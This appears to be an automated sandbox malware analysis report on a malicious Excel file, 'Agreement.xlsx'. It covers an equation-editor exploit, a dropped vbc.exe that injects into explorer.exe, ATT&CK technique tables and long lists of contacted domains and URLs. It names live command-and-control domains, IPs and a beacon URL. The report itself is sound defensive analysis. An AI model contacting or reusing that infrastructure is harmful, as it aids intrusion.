          Source: Yara matchFile source: 00000005.00000002.2203086612.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2372400870.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2203183179.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2372523372.0000000000210000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2203219773.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2157787740.0000000003B59000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2372501174.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Masquerading111OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion3LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer14Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools11Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol23SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information31Cached Domain CredentialsSystem Information Discovery113VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing22DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 345179 Sample: Agreement.xlsx Startdate: 27/01/2021 Architecture: WINDOWS Score: 100 37 www.tuvandadayvitos24h.online 2->37 55 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->55 57 Multi AV Scanner detection for domain / URL 2->57 59 Found malware configuration 2->59 61 14 other signatures 2->61 11 EQNEDT32.EXE 12 2->11         started        16 EXCEL.EXE 37 17 2->16         started        signatures3 process4 dnsIp5 45 18.194.54.219, 49165, 80 AMAZON-02US United States 11->45 33 C:\Users\user\AppData\Local\...\hm2[1].exe, PE32 11->33 dropped 35 C:\Users\Public\vbc.exe, PE32 11->35 dropped 79 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 11->79 18 vbc.exe 11->18         started        file6 signatures7 process8 signatures9 47 Detected unpacking (changes PE section rights) 18->47 49 Detected unpacking (overwrites its own PE header) 18->49 51 Machine Learning detection for dropped file 18->51 53 2 other signatures 18->53 21 vbc.exe 18->21         started        process10 signatures11 63 Modifies the context of a thread in another process (thread injection) 21->63 65 Maps a DLL or memory area into another process 21->65 67 Sample uses process hollowing technique 21->67 69 Queues an APC in another process (thread injection) 21->69 24 explorer.exe 21->24 injected process12 dnsIp13 39 www.mgg360.com 66.152.187.17, 49167, 80 MULTA-ASN1US United States 24->39 41 rizrvd.com 34.102.136.180, 49166, 49168, 49169 GOOGLEUS United States 24->41 43 9 other IPs or domains 24->43 71 System process connects to network (likely due to code injection or exploit) 24->71 28 wlanext.exe 24->28         started        signatures14 process15 signatures16 73 Modifies the context of a thread in another process (thread injection) 28->73 75 Maps a DLL or memory area into another process 28->75 77 Tries to detect virtualization through RDTSC time measurements 28->77 31 cmd.exe 28->31         started        process17

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          No Antivirus matches

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\Public\vbc.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hm2[1].exe100%Joe Sandbox ML

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          4.2.vbc.exe.c70000.3.unpack100%AviraHEUR/AGEN.1109526Download File
          5.2.vbc.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          kolamart.com5%VirustotalBrowse
          ismaelworks.com6%VirustotalBrowse
          www.mgg360.com0%VirustotalBrowse
          activagebenefits.net2%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/favicon.ico0%Avira URL Cloudsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://buscar.ozu.es/0%Avira URL Cloudsafe
          http://thesnake.herokuapp.com/snakes0%Avira URL Cloudsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://www.usmedicarenow.com/bw82/?OxlhlP1x=cQgJWKf5RX1pgHqtrNlNvU1Wcwt7yBWYkREyiU0JrpPbxB8OGrmWpa/gYGeP1DcG9D81oQ==&-Zz=NpM4AdWXGTqt_ry00%Avira URL Cloudsafe
          http://www.ozu.es/favicon.ico0%Avira URL Cloudsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/0%Avira URL Cloudsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://p.zhongsou.com/favicon.ico0%Avira URL Cloudsafe
          http://service2.bfast.com/0%URL Reputationsafe
          http://service2.bfast.com/0%URL Reputationsafe
          http://service2.bfast.com/0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          kolamart.com
          34.102.136.180
          truetrueunknown
          ismaelworks.com
          31.220.110.116
          truetrueunknown
          www.mgg360.com
          66.152.187.17
          truetrueunknown
          activagebenefits.net
          34.102.136.180
          truetrueunknown
          ext-sq.squarespace.com
          198.185.159.144
          truefalse
            high
            rizrvd.com
            34.102.136.180
            truetrue
              unknown
              www.ismaelworks.com
              unknown
              unknowntrue
                unknown
                www.activagebenefits.net
                unknown
                unknowntrue
                  unknown
                  www.kolamart.com
                  unknown
                  unknowntrue
                    unknown
                    www.usmedicarenow.com
                    unknown
                    unknowntrue
                      unknown
                      www.tuvandadayvitos24h.online
                      unknown
                      unknowntrue
                        unknown
                        www.rizrvd.com
                        unknown
                        unknowntrue
                          unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://www.usmedicarenow.com/bw82/?OxlhlP1x=cQgJWKf5RX1pgHqtrNlNvU1Wcwt7yBWYkREyiU0JrpPbxB8OGrmWpa/gYGeP1DcG9D81oQ==&-Zz=NpM4AdWXGTqt_ry0true
                          • Avira URL Cloud: safe
                          unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://search.chol.com/favicon.icoexplorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                            high
                            http://www.mercadolivre.com.br/explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://www.merlin.com.pl/favicon.icoexplorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://search.ebay.de/explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                              high
                              http://www.mtv.com/explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                high
                                http://www.rambler.ru/explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                  high
                                  http://www.nifty.com/favicon.icoexplorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                    high
                                    http://www.dailymail.co.uk/explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www3.fnac.com/favicon.icoexplorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                      high
                                      http://buscar.ya.com/explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                        high
                                        http://search.yahoo.com/favicon.icoexplorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                          high
                                          http://www.iis.fhg.de/audioPAexplorer.exe, 00000006.00000000.2167227314.0000000004B50000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.sogou.com/favicon.icoexplorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                            high
                                            http://asp.usatoday.com/explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                              high
                                              http://fr.search.yahoo.com/explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                high
                                                http://rover.ebay.comexplorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                  high
                                                  http://in.search.yahoo.com/explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                    high
                                                    http://img.shopzilla.com/shopzilla/shopzilla.icoexplorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                      high
                                                      http://search.ebay.in/explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                        high
                                                        http://image.excite.co.jp/jp/favicon/lep.icoexplorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://%s.comexplorer.exe, 00000006.00000000.2178834889.000000000A330000.00000008.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        low
                                                        http://msk.afisha.ru/explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                          high
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namevbc.exe, 00000004.00000002.2157265721.000000000235A000.00000004.00000001.sdmpfalse
                                                            high
                                                            http://busca.igbusca.com.br//app/static/images/favicon.icoexplorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://search.rediff.com/explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              high
                                                              http://www.windows.com/pctv.explorer.exe, 00000006.00000000.2166477724.0000000003C40000.00000002.00000001.sdmpfalse
                                                                high
                                                                http://www.ya.com/favicon.icoexplorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  high
                                                                  http://www.etmall.com.tw/favicon.icoexplorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://it.search.dada.net/favicon.icoexplorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://search.naver.com/explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    high
                                                                    http://www.google.ru/explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      high
                                                                      http://search.hanafos.com/favicon.icoexplorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://cgi.search.biglobe.ne.jp/favicon.icoexplorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.abril.com.br/favicon.icoexplorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://search.daum.net/explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                        high
                                                                        http://search.naver.com/favicon.icoexplorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          high
                                                                          http://search.msn.co.jp/results.aspx?q=explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://www.clarin.com/favicon.icoexplorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                            high
                                                                            http://buscar.ozu.es/explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://kr.search.yahoo.com/explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                              high
                                                                              http://search.about.com/explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                high
                                                                                http://thesnake.herokuapp.com/snakesvbc.exe, 00000004.00000002.2157265721.000000000235A000.00000004.00000001.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://busca.igbusca.com.br/explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activityexplorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                  high
                                                                                  http://www.ask.com/explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    high
                                                                                    http://www.priceminister.com/favicon.icoexplorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                      high
                                                                                      http://www.cjmall.com/explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                        high
                                                                                        http://search.centrum.cz/explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                          high
                                                                                          http://suche.t-online.de/explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            high
                                                                                            http://www.google.it/explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                              high
                                                                                              http://search.auction.co.kr/explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              http://www.ceneo.pl/explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                high
                                                                                                http://www.amazon.de/explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                  high
                                                                                                  http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000006.00000000.2175705501.000000000861C000.00000004.00000001.sdmpfalse
                                                                                                    high
                                                                                                    http://sads.myspace.com/explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                      high
                                                                                                      http://busca.buscape.com.br/favicon.icoexplorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://www.pchome.com.tw/favicon.icoexplorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://browse.guardian.co.uk/favicon.icoexplorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://google.pchome.com.tw/explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        high
                                                                                                        http://www.rambler.ru/favicon.icoexplorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          high
                                                                                                          http://uk.search.yahoo.com/explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            high
                                                                                                            http://espanol.search.yahoo.com/explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                              high
                                                                                                              http://www.ozu.es/favicon.icoexplorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              http://search.sify.com/explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                high
                                                                                                                http://openimage.interpark.com/interpark.icoexplorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  http://search.yahoo.co.jp/favicon.icoexplorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  http://search.ebay.com/explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    http://www.gmarket.co.kr/explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://search.nifty.com/explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      http://searchresults.news.com.au/explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      http://www.google.si/explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        http://www.google.cz/explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          http://www.soso.com/explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://www.univision.com/explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              http://search.ebay.it/explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://images.joins.com/ui_c/fvc_joins.icoexplorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://www.asharqalawsat.com/explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  http://busca.orange.es/explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://cnweb.search.live.com/results.aspx?q=explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://auto.search.msn.com/response.asp?MT=explorer.exe, 00000006.00000000.2178834889.000000000A330000.00000008.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://search.yahoo.co.jpexplorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        http://www.target.com/explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://buscador.terra.es/explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          http://search.orange.co.uk/favicon.icoexplorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          http://www.iask.com/explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          http://www.tesco.com/explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://cgi.search.biglobe.ne.jp/explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            http://search.seznam.cz/favicon.icoexplorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://suche.freenet.de/favicon.icoexplorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://search.interpark.com/explorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://search.ipop.co.kr/favicon.icoexplorer.exe, 00000006.00000000.2179159439.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
